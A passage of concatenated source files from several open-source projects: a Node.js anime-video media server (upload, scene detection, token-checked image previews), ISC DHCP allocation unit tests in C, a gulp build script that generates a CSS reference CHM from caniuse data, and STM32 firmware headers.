fs.ensureDirSync(path.dirname(videoFilePath));
req.pipe(fs.createWriteStream(videoFilePath));
req.on("end", () => {
res.sendStatus(204);
console.log(`Uploaded ${videoFilePath}`);
});
} else if (req.method === "DELETE") {
console.log(`Deleting ${videoFilePath}`);
fs.removeSync(videoFilePath);
console.log(`Deleted ${videoFilePath}`);
res.sendStatus(204);
}
};
<|start_filename|>src/lib/detect-scene.js<|end_filename|>
import os from "os";
import path from "path";
import child_process from "child_process";
import fs from "fs-extra";
import Canvas from "canvas";
import getVideoDuration from "./get-video-duration.js";
export default async (filePath, t, minDuration) => {
if (t < 0) {
return null;
}
const videoDuration = getVideoDuration(filePath);
if (videoDuration === null || t > videoDuration) {
return null;
}
const tBefore = 5;
const tAfter = 5;
let trimStart = t - tBefore;
let trimEnd = t + tAfter;
if (t - tBefore < 0) {
trimStart = 0;
trimEnd = tBefore + tAfter;
}
if (t + tAfter > videoDuration) {
trimStart = videoDuration - tBefore - tAfter;
trimEnd = videoDuration;
}
const fps = 12;
const width = 32;
const height = 18;
const tempPath = path.join(os.tmpdir(), `videoPreview${process.hrtime().join("")}`);
fs.removeSync(tempPath);
fs.ensureDirSync(tempPath);
const ffmpeg = child_process.spawnSync(
"ffmpeg",
[
"-y",
"-ss",
trimStart - 10,
"-i",
filePath,
"-ss",
"10",
"-t",
trimEnd - trimStart,
"-an",
"-vf",
`fps=${fps},scale=${width}:${height}`,
`${tempPath}/%04d.jpg`,
],
{ encoding: "utf-8" }
);
// console.log(ffmpeg.stderr);
const imageDataList = await Promise.all(
fs.readdirSync(tempPath).map(
(file) =>
new Promise(async (resolve) => {
const canvas = Canvas.createCanvas(width, height);
const ctx = canvas.getContext("2d");
const image = await Canvas.loadImage(path.join(tempPath, file));
ctx.drawImage(image, 0, 0, width, height);
resolve(ctx.getImageData(0, 0, width, height).data);
})
)
);
fs.removeSync(tempPath);
const getImageDiff = (a, b) => {
let diff = 0;
for (let i = 0; i < a.length; i++) {
diff += Math.abs(a[i] - b[i]);
}
return Math.floor(diff / 1000);
};
const frameInfo = imageDataList
.map((curr, index, array) => getImageDiff(curr, index ? array[index - 1] : curr))
.map((curr, index) => ({
id: index,
diff: curr,
}));
const threshold = 50;
let centerFrameID = Math.floor((t - trimStart) * fps);
if (centerFrameID > frameInfo.length - 1) {
centerFrameID = frameInfo.length - 1;
}
const minFrames = (minDuration / 2) * fps;
let startFrameID = centerFrameID;
let endFrameID = centerFrameID;
for (let i = centerFrameID; i >= 0; i--) {
// compare with prev frame
if (i === 0 || (frameInfo[i].diff > threshold && centerFrameID - i > minFrames)) {
startFrameID = i;
break;
}
}
for (let i = centerFrameID; i < frameInfo.length; i++) {
// compare with next frame
if (
i + 1 === frameInfo.length ||
(frameInfo[i + 1].diff > threshold && i - centerFrameID > minFrames)
) {
endFrameID = i;
break;
}
}
// debug use
// frameInfo[centerFrameID] = Object.assign(frameInfo[centerFrameID], {center:true});
// frameInfo[startFrameID] = Object.assign(frameInfo[startFrameID], {start:true});
// frameInfo[endFrameID] = Object.assign(frameInfo[endFrameID], {end:true});
// console.log(frameInfo);
const sceneTrimStart = trimStart + startFrameID / fps;
const sceneTrimEnd = trimStart + endFrameID / fps;
return {
start: sceneTrimStart,
end: sceneTrimEnd,
duration: videoDuration,
};
};
<|start_filename|>src/check-secret.js<|end_filename|>
const { TRACE_API_SECRET } = process.env;
export default async (req, res, next) => {
if (req.header("x-trace-secret") !== TRACE_API_SECRET) {
res.status(401).send("Unauthorized");
return;
}
next();
};
<|start_filename|>src/image.js<|end_filename|>
import path from "path";
import fs from "fs-extra";
import crypto from "crypto";
import child_process from "child_process";
const { VIDEO_PATH = "/mnt/", TRACE_MEDIA_SALT } = process.env;
const generateImagePreview = (filePath, t, size = "m") => {
const ffmpeg = child_process.spawnSync("ffmpeg", [
"-hide_banner",
"-loglevel",
"error",
"-nostats",
"-y",
"-ss",
t - 10,
"-i",
filePath,
"-ss",
"10",
"-vf",
`scale=${{ l: 640, m: 320, s: 160 }[size]}:-2`,
"-c:v",
"mjpeg",
"-vframes",
"1",
"-f",
"image2pipe",
"pipe:1",
]);
if (ffmpeg.stderr.length) {
console.log(ffmpeg.stderr.toString());
}
return ffmpeg.stdout;
};
export default async (req, res) => {
if (
TRACE_MEDIA_SALT &&
req.query.token !==
crypto
.createHash("sha1")
.update([req.params.anilistID, req.params.filename, req.query.t, TRACE_MEDIA_SALT].join(""))
.digest("base64")
.replace(/[^0-9A-Za-z]/g, "")
) {
res.status(403).send("Forbidden");
return;
}
const t = parseFloat(req.query.t);
if (isNaN(t) || t < 0) {
res.status(400).send("Bad Request. Invalid param: t");
return;
}
const videoFilePath = path.join(VIDEO_PATH, req.params.anilistID, req.params.filename);
if (!videoFilePath.startsWith(VIDEO_PATH)) {
res.status(403).send("Forbidden");
return;
}
if (!fs.existsSync(videoFilePath)) {
res.status(404).send("Not found");
return;
}
const size = req.query.size || "m";
if (!["l", "m", "s"].includes(size)) {
res.status(400).send("Bad Request. Invalid param: size");
return;
}
try {
const image = generateImagePreview(videoFilePath, t, size);
res.set("Content-Type", "image/jpg");
res.send(image);
} catch (e) {
console.log(e);
res.status(500).send("Internal Server Error");
}
};
| soruly/trace.moe-media |
<|start_filename|>common/tests/test_alloc.c<|end_filename|>
/*
* Copyright (c) 2007,2009,2012 by Internet Systems Consortium, Inc. ("ISC")
*
* We test the functions provided in alloc.c here. These are very
* basic functions, and it is very important that they work correctly.
*
* You can see two different styles of testing:
*
* - In the first, we have a single test for each function that tests
* all of the possible ways it can operate. (This is the case for
* the buffer tests.)
*
* - In the second, we have a separate test for each of the ways a
* function can operate. (This is the case for the data_string
* tests.)
*
* The advantage of a single test per function is that you have fewer
* tests, and less duplicated and extra code. The advantage of having
* a separate test is that each test is simpler. Plus if you need to
* allow certain tests to fail for some reason (known bugs that are
* hard to fix for example), then
*/
/** @TODO: dmalloc() test */
#include "config.h"
#include <atf-c.h>
#include "dhcpd.h"
ATF_TC(buffer_allocate);
ATF_TC_HEAD(buffer_allocate, tc) {
atf_tc_set_md_var(tc, "descr", "buffer_allocate basic test");
}
ATF_TC_BODY(buffer_allocate, tc) {
struct buffer *buf = 0;
/*
* Check a 0-length buffer.
*/
buf = NULL;
if (!buffer_allocate(&buf, 0, MDL)) {
atf_tc_fail("failed on 0-len buffer");
}
if (!buffer_dereference(&buf, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
if (buf != NULL) {
atf_tc_fail("buffer_dereference() did not NULL-out buffer");
}
/*
* Check an actual buffer.
*/
buf = NULL;
if (!buffer_allocate(&buf, 100, MDL)) {
atf_tc_fail("failed on allocate 100 bytes\n");
}
if (!buffer_dereference(&buf, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
if (buf != NULL) {
atf_tc_fail("buffer_dereference() did not NULL-out buffer");
}
/*
* Okay, we're happy.
*/
atf_tc_pass();
}
ATF_TC(buffer_reference);
ATF_TC_HEAD(buffer_reference, tc) {
atf_tc_set_md_var(tc, "descr", "buffer_reference basic test");
}
ATF_TC_BODY(buffer_reference, tc) {
struct buffer *a, *b;
/*
* Create a buffer.
*/
a = NULL;
if (!buffer_allocate(&a, 100, MDL)) {
atf_tc_fail("failed on allocate 100 bytes");
}
/**
* Confirm buffer_reference() doesn't work if we pass in NULL.
*
* @TODO: we should confirm we get an error message here.
*/
if (buffer_reference(NULL, a, MDL)) {
atf_tc_fail("succeeded on an error input");
}
/**
* @TODO: we should confirm we get an error message if we pass
* a non-NULL target.
*/
/*
* Confirm we work under normal circumstances.
*/
b = NULL;
if (!buffer_reference(&b, a, MDL)) {
atf_tc_fail("buffer_reference() failed");
}
if (b != a) {
atf_tc_fail("incorrect pointer returned");
}
if (b->refcnt != 2) {
atf_tc_fail("incorrect refcnt");
}
/*
* Clean up.
*/
if (!buffer_dereference(&b, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
if (!buffer_dereference(&a, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
}
ATF_TC(buffer_dereference);
ATF_TC_HEAD(buffer_dereference, tc) {
atf_tc_set_md_var(tc, "descr", "buffer_dereference basic test");
}
ATF_TC_BODY(buffer_dereference, tc) {
struct buffer *a, *b;
/**
* Confirm buffer_dereference() doesn't work if we pass in NULL.
*
* TODO: we should confirm we get an error message here.
*/
if (buffer_dereference(NULL, MDL)) {
atf_tc_fail("succeeded on an error input");
}
/**
* Confirm buffer_dereference() doesn't work if we pass in
* a pointer to NULL.
*
* @TODO: we should confirm we get an error message here.
*/
a = NULL;
if (buffer_dereference(&a, MDL)) {
atf_tc_fail("succeeded on an error input");
}
/*
* Confirm we work under normal circumstances.
*/
a = NULL;
if (!buffer_allocate(&a, 100, MDL)) {
atf_tc_fail("failed on allocate");
}
if (!buffer_dereference(&a, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
if (a != NULL) {
atf_tc_fail("non-null buffer after buffer_dereference()");
}
/**
* Confirm we get an error from negative refcnt.
*
* @TODO: we should confirm we get an error message here.
*/
a = NULL;
if (!buffer_allocate(&a, 100, MDL)) {
atf_tc_fail("failed on allocate");
}
b = NULL;
if (!buffer_reference(&b, a, MDL)) {
atf_tc_fail("buffer_reference() failed");
}
a->refcnt = 0; /* purposely set to invalid value */
if (buffer_dereference(&a, MDL)) {
atf_tc_fail("buffer_dereference() succeeded on error input");
}
a->refcnt = 2;
if (!buffer_dereference(&b, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
if (!buffer_dereference(&a, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
}
ATF_TC(data_string_forget);
ATF_TC_HEAD(data_string_forget, tc) {
atf_tc_set_md_var(tc, "descr", "data_string_forget basic test");
}
ATF_TC_BODY(data_string_forget, tc) {
struct buffer *buf;
struct data_string a;
const char *str = "Lorem ipsum dolor sit amet turpis duis.";
/*
* Create the string we want to forget.
*/
memset(&a, 0, sizeof(a));
a.len = strlen(str);
buf = NULL;
if (!buffer_allocate(&buf, a.len, MDL)) {
atf_tc_fail("out of memory");
}
if (!buffer_reference(&a.buffer, buf, MDL)) {
atf_tc_fail("buffer_reference() failed");
}
a.data = a.buffer->data;
memcpy(a.buffer->data, str, a.len);
/*
* Forget and confirm we've forgotten.
*/
data_string_forget(&a, MDL);
if (a.len != 0) {
atf_tc_fail("incorrect length");
}
if (a.data != NULL) {
atf_tc_fail("incorrect data");
}
if (a.terminated) {
atf_tc_fail("incorrect terminated");
}
if (a.buffer != NULL) {
atf_tc_fail("incorrect buffer");
}
if (buf->refcnt != 1) {
atf_tc_fail("too many references to buf");
}
/*
* Clean up buffer.
*/
if (!buffer_dereference(&buf, MDL)) {
atf_tc_fail("buffer_reference() failed");
}
}
ATF_TC(data_string_forget_nobuf);
ATF_TC_HEAD(data_string_forget_nobuf, tc) {
atf_tc_set_md_var(tc, "descr", "data_string_forget test, "
"data_string without buffer");
}
ATF_TC_BODY(data_string_forget_nobuf, tc) {
struct data_string a;
const char *str = "Lorem ipsum dolor sit amet massa nunc.";
/*
* Create the string we want to forget.
*/
memset(&a, 0, sizeof(a));
a.len = strlen(str);
a.data = (const unsigned char *)str;
a.terminated = 1;
/*
* Forget and confirm we've forgotten.
*/
data_string_forget(&a, MDL);
if (a.len != 0) {
atf_tc_fail("incorrect length");
}
if (a.data != NULL) {
atf_tc_fail("incorrect data");
}
if (a.terminated) {
atf_tc_fail("incorrect terminated");
}
if (a.buffer != NULL) {
atf_tc_fail("incorrect buffer");
}
}
ATF_TC(data_string_copy);
ATF_TC_HEAD(data_string_copy, tc) {
atf_tc_set_md_var(tc, "descr", "data_string_copy basic test");
}
ATF_TC_BODY(data_string_copy, tc) {
struct data_string a, b;
const char *str = "Lorem ipsum dolor sit amet orci aliquam.";
/*
* Create the string we want to copy.
*/
memset(&a, 0, sizeof(a));
a.len = strlen(str);
if (!buffer_allocate(&a.buffer, a.len, MDL)) {
atf_tc_fail("out of memory");
}
a.data = a.buffer->data;
memcpy(a.buffer->data, str, a.len);
/*
* Copy the string, and confirm it works.
*/
memset(&b, 0, sizeof(b));
data_string_copy(&b, &a, MDL);
if (b.len != a.len) {
atf_tc_fail("incorrect length");
}
if (b.data != a.data) {
atf_tc_fail("incorrect data");
}
if (b.terminated != a.terminated) {
atf_tc_fail("incorrect terminated");
}
if (b.buffer != a.buffer) {
atf_tc_fail("incorrect buffer");
}
/*
* Clean up.
*/
data_string_forget(&b, MDL);
data_string_forget(&a, MDL);
}
ATF_TC(data_string_copy_nobuf);
ATF_TC_HEAD(data_string_copy_nobuf, tc) {
atf_tc_set_md_var(tc, "descr", "data_string_copy test, "
"data_string without buffer");
}
ATF_TC_BODY(data_string_copy_nobuf, tc) {
struct data_string a, b;
const char *str = "Lorem ipsum dolor sit amet cras amet.";
/*
* Create the string we want to copy.
*/
memset(&a, 0, sizeof(a));
a.len = strlen(str);
a.data = (const unsigned char *)str;
a.terminated = 1;
/*
* Copy the string, and confirm it works.
*/
memset(&b, 0, sizeof(b));
data_string_copy(&b, &a, MDL);
if (b.len != a.len) {
atf_tc_fail("incorrect length");
}
if (b.data != a.data) {
atf_tc_fail("incorrect data");
}
if (b.terminated != a.terminated) {
atf_tc_fail("incorrect terminated");
}
if (b.buffer != a.buffer) {
atf_tc_fail("incorrect buffer");
}
/*
* Clean up.
*/
data_string_forget(&b, MDL);
data_string_forget(&a, MDL);
}
ATF_TP_ADD_TCS(tp)
{
ATF_TP_ADD_TC(tp, buffer_allocate);
ATF_TP_ADD_TC(tp, buffer_reference);
ATF_TP_ADD_TC(tp, buffer_dereference);
ATF_TP_ADD_TC(tp, data_string_forget);
ATF_TP_ADD_TC(tp, data_string_forget_nobuf);
ATF_TP_ADD_TC(tp, data_string_copy);
ATF_TP_ADD_TC(tp, data_string_copy_nobuf);
return (atf_no_error());
}
| xrg/dhcp-mageia-test |
<|start_filename|>gulpfile.js<|end_filename|>
"use strict";
const caniuse = require("caniuse-db/data");
const convertEncoding = require("gulp-convert-encoding");
const fs = require("fs-extra");
const gulp = require("gulp");
const log = require('fancy-log');
const htmlhint = require("gulp-htmlhint");
const iconv = require("iconv-lite");
const path = require("path");
const replace = require("gulp-replace");
const which = require("which");
const { JSDOM } = require("jsdom");
const classFix = {
p: "experimentsupport",
a: "partsupport",
n: "unsupport",
y: "support"
};
// 生成缩进
function tab(num) {
return "\t".repeat(num);
}
// 比较两个版本号,v1>v2则返回值大于零 v1<v2则返回值大于0,若v1==v2则返回值等于0
function compare(v1, v2) {
v1 = convert(v1);
v2 = convert(v2);
let diff = 0;
for (let i = 0;
(i < v1.length || i < v2.length) && diff === 0; i++) {
diff = (v1[i] || 0) - (v2[i] || 0);
}
return diff;
}
// 将版本号按小数点分割为数组
function convert(ver) {
return /Edge/.test(ver) ? [12] : ver.toString().split(".").map(function(subVer) {
return +subVer || 0;
});
}
function getPrefix(bro, ver) {
bro = caniuse.agents[bro];
return (bro.prefix_exceptions || {})[ver] || bro.prefix;
}
function compatible(data, strPropName, propName, strIndent, indent) {
let status = data.stats;
let str = "<!-- compatible:" + strPropName + ' --><table class="g-data"><thead><tr>';
let thead = "";
let tbody = "";
let tabData = {};
let rowNum = 1;
for (let browserName in status) {
if (JSON.stringify(status[browserName]) === "{}") {
delete status[browserName];
continue;
}
thead += `<th><span class="browser-${ browserName }">${ caniuse.agents[browserName].browser.replace(/\s+/g, "<br>") }</span></th>`;
tabData[browserName] = {};
for (let browserVersion in status[browserName]) {
tbody = status[browserName][browserVersion];
if (propName === "viewport-units") {
tbody = tbody.replace(/(\s+#\d+)+$/, "");
}
if (!/\bu\b/i.test(tbody)) {
tbody = tbody.replace(/\bx\b/, function() {
return "-" + getPrefix(browserName, browserVersion) + "-";
});
// opera做数据特殊处理
if (browserName === "opera" && browserVersion >= 13 && tbody === "y") {
tbody += getPrefix(browserName, browserVersion);
}
if (tabData[browserName][tbody]) {
tabData[browserName][tbody].push(browserVersion);
} else {
tabData[browserName][tbody] = [browserVersion];
}
}
}
// opera做数据特殊处理
if (browserName === "opera" && !tabData[browserName]["y -webkit-"] && tabData[browserName].y) {
tabData[browserName].y = tabData[browserName].y.concat(tabData[browserName].ywebkit);
delete tabData[browserName].ywebkit;
}
for (let stats in tabData[browserName]) {
tbody = tabData[browserName][stats].join(",").split(/\s*[,-]\s*/g).sort(compare);
if (tbody.length === 1) {
tabData[browserName][stats] = tbody;
} else {
tabData[browserName][stats] = [tbody[0], tbody[tbody.length - 1]];
}
}
tbody = [];
for (let stats in tabData[browserName]) {
tbody.push({
supportInfo: /#(\d+)/.test(stats) ? (' <a href="#support' + RegExp.$1 + '">#' + RegExp.$1 + "</a>") : "",
className: ' class="' + classFix[stats.substr(0, 1)] + '"',
prefix: /(-\w+-)/.test(stats) ? (' <sup class="fix">' + RegExp.$1 + "</sup>") : "",
value: tabData[browserName][stats],
type: stats
});
}
tabData[browserName] = tbody.sort(function(a, b) {
return compare(a.value[0], b.value[0]);
});
rowNum = Math.max(rowNum, tbody.length);
}
for (let browserName in tabData) {
tbody = rowNum - tabData[browserName].length + 1;
tabData[browserName][tabData[browserName].length - 1].rowspan = tbody > 1 ? ' rowspan="' + tbody + '"' : "";
if (/^y\w*$/.test(tabData[browserName][tabData[browserName].length - 1].type) && tabData[browserName][tabData[browserName].length - 1].value.length > 1) {
tabData[browserName][tabData[browserName].length - 1].value = [tabData[browserName][tabData[browserName].length - 1].value[0] + "+"];
}
}
tbody = "";
for (let i = 0; i < rowNum; i++) {
tbody += "<tr>";
for (let browserName in status) {
if (tabData[browserName][i]) {
tbody += "<td" + (tabData[browserName][i].rowspan || "") + tabData[browserName][i].className + ">" + tabData[browserName][i].value.join("-") + tabData[browserName][i].prefix + tabData[browserName][i].supportInfo + "</td>";
}
}
tbody += "</tr>";
}
str += thead + "</tr></thead><tbody>" + tbody + "</tbody></table><!-- compatible:end -->";
str = strIndent + str.replace(/(\s*<\/?(ul|div|section|tr|t\w{2,})(\s[^>]+)*>\s*)/ig, "\n$1\n").replace(/(<\/(li|h\d|th|td)>\s*)/ig, "$1\n").replace(/\n+(<[\/\!]?(\w+)?)/g, indent);
return str;
}
// 使用caniuse.com数据自动生成兼容性图表
function caniuseData(str, strIndent, strPropName, subName, index, html) {
strIndent = strIndent.match(/\t| {4}/g);
strIndent = strIndent ? tab(strIndent.length) : "";
// 缩进所用的数据
let indentData = {
thead: strIndent + tab(1),
tbody: strIndent + tab(1),
tr: strIndent + tab(2),
th: strIndent + tab(3),
td: strIndent + tab(3)
};
// 生成缩进
function indent(s, tag, tagName) {
return "\r\n" + (indentData[tagName] || strIndent) + tag;
}
// 数据项在数据库中的名称与css属性名称转换
let propFix = {
"repeating-linear-gradient()": "css-repeating-gradients",
"repeating-radial-gradient()": "css-repeating-gradients",
"linear-gradient()": "css-gradients",
"radial-gradient()": "css-gradients",
"user-select": "user-select-none",
"box-sizing": "css3-boxsizing",
"text-shadow": "textshadow",
"tab-size": "css3-tabsize",
"box-shadow": "boxshadow",
transform: "transforms2d",
"@media": "mediaqueries",
columns: "multicolumn",
vmax: "viewport-units",
vmin: "viewport-units",
vw: "viewport-units",
vh: "viewport-units",
"rgba": "css3-colors",
"hsla": "css3-colors",
"hsl": "css3-colors",
},
regPropSub = /((-\w+)+|\(\))$/,
regPropS = /s$/,
propName,
data;
caniuse.data["border-radius"].stats.safari["5"] = "y #1";
function getDate(prop) {
prop = propFix[prop] || prop;
data = caniuse.data[prop] || caniuse.data["css-" + prop];
if (!data && regPropSub.test(prop)) {
getDate(prop.replace(regPropSub, ""));
}
if (!data && !regPropS.test(prop)) {
getDate(prop + "s");
}
if (data) {
if (/^column-break\b/.test(propName)) {
// 克隆一份数据
data = JSON.parse(JSON.stringify(data));
data.stats.firefox = JSON.parse(JSON.stringify(data.stats.firefox).replace(/"a\b[^"]*/g, "\"n"));
} else {
if (/^(vw|vh|vmin|(repeating-)?linear-gradient\(\)|columns|column(-\w+)*)$/.test(propName)) {
data = JSON.parse(JSON.stringify(data).replace(/"a\b/g, "\"y").replace(/\s*\#\d\"/g, "\""));
} else if (/^(vmax|(repeating-)?radial-gradient\(\))$/.test(propName)) {
data = JSON.parse(JSON.stringify(data).replace(/"a\b[^"]*/g, "\"n"));
}
// caniuse-db 版本 1.0.30000013 中,出现了Android的奇怪版本号37,未搞懂,先过滤掉
for (let i in data.stats.android) {
if (i > 36) {
delete data.stats.android[i];
}
}
// 非数字版本号,全部删掉
for (let browserName in data.stats) {
for (let verName in data.stats[browserName]) {
if (!/\d/.test(verName)) {
delete data.stats[browserName][verName];
}
}
}
}
propName = prop;
}
}
getDate(strPropName === "start" ? readDom(html, "#category").name : strPropName);
if (!data) {
if (propName) {
log.error("caniuse数据中无此项:\t" + propName);
} else {
log.error("未指定caniuse查询项目。");
}
} else {
str = compatible(data, strPropName, propName, strIndent, indent) || str;
}
return str;
}
// html修复
gulp.task("htm", function() {
log("正在修复HTML文件");
return gulp.src(["**/*.htm", "**/*.html", "!**/node_modules/**/*", "!index.htm"])
.pipe(replace(/([\t ]*)<\!--\s*compatible\s*:\s*(\w+(-\w+)?)\s*-->[\s\S]*?<!--\s*compatible\s*:\s*end\s*-->/g, caniuseData))
.pipe(replace(/(\t|\n) {4,}/g, function(str, char) {
return char + tab(parseInt(str.length / 4));
}))
.pipe(replace(/<meta\s+charset=(["'])[\w-]+\1(?:\s+\/)?>/i, process.env.CI ? "<meta charset=\"gbk\">" : "<meta charset=\"utf-8\" />"))
.pipe(convertEncoding({to: process.env.CI ? "gbk" : "utf8"}))
.pipe(gulp.dest("."));
});
// html修复
gulp.task("gbk-js", function(cb) {
if (process.env.CI) {
log("正在修改js文件文件编码");
return gulp.src(["js/**/*.js"])
.pipe(convertEncoding({to: "gbk"}))
.pipe(gulp.dest("js"));
} else {
cb();
}
});
// html验证
gulp.task("lint", function() {
log("正在检查所有html文件代码是否合法");
return gulp.src(["**/*.htm", "**/*.html", "!**/node_modules/**/*"])
.pipe(htmlhint())
.pipe(htmlhint.reporter());
});
function readDom(html, selector) {
const dom = new JSDOM(html);
return dom.window.document.querySelector(selector);
}
function readTree() {
return fs.readFile("index.htm")
.then(html => readDom(html.toString(), "#dytree .unfold"))
.then(ul2array);
}
function li2obj(li) {
let link = li.querySelector("a");
let ul = li.querySelector("ul");
return {
html: link.innerHTML.replace(/"/g, """),
link: link.href,
children: ul && ul2array(ul)
}
}
function ul2array(ul) {
return Array.from(ul.children).filter(tag => tag.tagName === "LI").map(li2obj)
}
let projWalkerPromise;
function projWalker() {
if (!projWalkerPromise) {
projWalkerPromise = fsWalker(".").then(files => {
return files.filter(file => {
return file.dir && file.dir !== "images" && !/^(ZeroClipboard\.swf|prefixfree\.min\.js|\w+\.psd)$/.test(file.name)
}).map(file => {
return file.path
}).sort()
});
}
return projWalkerPromise;
}
function fsWalker(rootDir) {
// 遍历当前目录下的子对象
return fs.readdir(rootDir).then(subNames => {
// 储存当前目录下的子目录的遍历Promise对象
let subDirs = [];
// 储存当前目录下的文件
let subFiles = [];
// 排除`.*`、`node_modules`
subNames = subNames.filter(subName => {
return !/^(?:node_modules|\..*)$/i.test(subName);
}).map(subName => {
let subPath = path.join(rootDir, subName);
// 异步获取子对象状态
return fs.stat(subPath).then(stat => {
if (stat.isDirectory()) {
// 子对象是个目录,则递归查询
subDirs.push(fsWalker(subPath));
} else {
// 子对象是个文件
subFiles.push({
dir: rootDir === "." ? "" : rootDir,
name: subName,
path: subPath,
});
}
return stat;
});
});
// 等待所有fs.stat操作完成
return Promise.all(subNames).then(() => {
// 获取所有子目录的遍历结果
return Promise.all(subDirs).then(subDirsChilds => {
// 将子目录的遍历结果,与当前目录的遍历结果,合为一个数组
return subFiles.concat.apply(subFiles, subDirsChilds);
});
});
});
}
function treeWalker(node, nest) {
if (Array.isArray(node)) {
let html = node.map(node => treeWalker(node, nest)).join("");
if (nest) {
html = `<UL>${ html }</UL>`;
}
return html
} else {
let ImageNumber = nest ? `<param name="ImageNumber" value="${ node.children ? 1 : (/\//.test(node.link) ? 11 : 15) }">` : "";
let html = `<LI><OBJECT type="text/sitemap"><param name="Name" value="${ node.html }"><param name="Local" value="${ node.link }">${ ImageNumber }</OBJECT>`;
if (node.children) {
html += treeWalker(node.children, nest);
}
return html;
}
}
function build() {
let hhcPath;
if (fs.existsSync("hhc.exe")) {
hhcPath = "hhc.exe";
} else {
try {
hhcPath = which.sync("hhc");
} catch (ex) {
//
}
if (!hhcPath) {
["ProgramFiles", "ProgramFiles(x86)", "ProgramW6432", "TEMP"]
.map(envName => process.env[envName])
.filter(Boolean)
.map(rogramDir => path.join(rogramDir, "HTML Help Workshop/hhc.exe"))
.some(exePath => {
if (fs.existsSync(exePath)) {
hhcPath = exePath;
return true;
}
});
}
}
let opener = require("opener");
if (hhcPath) {
let child_process = require("child_process");
return new Promise((resolve, reject) => {
log("正在编译chm");
child_process.exec("taskkill /F /IM hh.exe", function() {
child_process.execFile(hhcPath, [path.join(process.cwd(), "css.hhp")], (error, stdout, stderr) => {
if (stderr) {
reject(stderr);
} else {
if (stdout && /\s+Created\s+.+?,\s+[\d\,]+\s+\w+\s+/.test(stdout)) {
resolve(stdout);
} else {
reject(stderr || stdout || error);
}
}
});
});
})
.then(stdout => {
if (!process.env.CI) {
opener("css.chm");
}
log(stdout);
log("chm编译成功");
}).catch(stderr => {
log.error(stderr);
log.error("chm编译发生错误");
});
} else {
log.error("未找到hhc.exe,请安装[HTML Help Workshop](https://download.microsoft.com/download/0/A/9/0A939EF6-E31C-430F-A3DF-DFAE7960D564/htmlhelp.exe)");
opener("css.hhp");
return Promise.reject(hhcPath);
}
}
//生成chm文件
gulp.task("chm", function() {
log("正在生成工程文件");
return Promise.all([
readTree(),
projWalker(),
]).then(function (results) {
let tree = results[0];
let files = results[1];
let pkg = require("./package.json");
let htmlHead = `<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"><HTML><HEAD><meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1"><!-- Sitemap 1.0 --></HEAD><BODY>`;
let hhc = `${ htmlHead }<OBJECT type="text/site properties"><param name="ExWindow Styles" value="0x200"><param name="Window Styles" value="0x800025"><param name="Font" value="MS Sans Serif,9,0"></OBJECT>${ treeWalker(tree, true) }</BODY></HTML>`;
let hhk = `${ htmlHead }<UL>${ treeWalker(tree) }</UL></BODY></HTML>`;
let hhp = "[OPTIONS]\nCompatibility=1.1 or later\nCompiled file=css.chm\nContents file=css.hhc\nDefault topic=quicksearch.htm\nDisplay compile progress=No\nFull-text search=Yes\nIndex file=css.hhk\nLanguage=0x804 中文(简体,中国)\nTitle=" + pkg.description + "\n\n\n[FILES]\n";
hhp += files.filter(path => {
if (/\.html?$/.test(path)) {
return false;
} else {
return true;
}
}).join("\n");
return Promise.all([
fs.writeFile("css.hhc", iconv.encode(hhc, "gbk")),
fs.writeFile("css.hhk", iconv.encode(hhk, "gbk")),
fs.writeFile("css.hhp", iconv.encode(hhp, "gbk")),
]);
}).then(build);
});
gulp.task("build", gulp.series("htm", "gbk-js", "chm"));
gulp.task("default", gulp.series("lint", "htm", "gbk-js", "chm"));
| gucong3000/css-book |
<|start_filename|>software/Inc/curelib_inc/curemisc.h<|end_filename|>
/*
*******************************************************************************
* [curemisc.h]
*
* This program is under the terms of the GPLv3.
* https://www.gnu.org/licenses/gpl-3.0.html
*
* Copyright(c) 2017 Keshikan (www.keshikan.net)
*******************************************************************************
*/
#ifndef _CUREMISC_H_
#define _CUREMISC_H_
#include <stdbool.h>
#include <stdint.h>
#ifndef BOOL
#define BOOL bool
#define TRUE true
#define FALSE false
#endif
//LO(HI)WORD: return lower(higher) 16bit of 32bit
//LO(HI)BYTE: return lower(higher) 4bit of 8bit
#ifndef LOWORD
#define LOWORD(n) ( (uint16_t)(n) )
#endif
#ifndef HIWORD
#define HIWORD(n) ( (uint16_t)(((uint32_t)(n) >> 16) & 0xFFFF) )
#endif
#ifndef LOBYTE
#define LOBYTE(n) ( ((uint8_t)(n)) & 0x0F )
#endif
#ifndef HIBYTE
#define HIBYTE(n) ( (uint8_t)(((n) >> 4) & 0x0F) )
#endif
typedef enum{
FUNC_ERROR,FUNC_SUCCESS
}FUNC_STATUS;
#endif
<|start_filename|>software/Src/main.c<|end_filename|>
/**
******************************************************************************
* @file : main.c
* @brief : Main program body
******************************************************************************
* This notice applies to any and all portions of this file
* that are not between comment pairs USER CODE BEGIN and
* USER CODE END. Other portions of this file, whether
* inserted by the user or by software development tools
* are owned by their respective copyright owners.
*
* Copyright (c) 2018 STMicroelectronics International N.V.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted, provided that the following conditions are met:
*
* 1. Redistribution of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* 3. Neither the name of STMicroelectronics nor the names of other
* contributors to this software may be used to endorse or promote products
* derived from this software without specific written permission.
* 4. This software, including modifications and/or derivative works of this
* software, must execute solely and exclusively on microcontroller or
* microprocessor devices manufactured by or for STMicroelectronics.
* 5. Redistribution and use of this software other than as permitted under
* this license is void and will automatically terminate your rights under
* this license.
*
* THIS SOFTWARE IS PROVIDED BY STMICROELECTRONICS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS, IMPLIED OR STATUTORY WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
* PARTICULAR PURPOSE AND NON-INFRINGEMENT OF THIRD PARTY INTELLECTUAL PROPERTY
* RIGHTS ARE DISCLAIMED TO THE FULLEST EXTENT PERMITTED BY LAW. IN NO EVENT
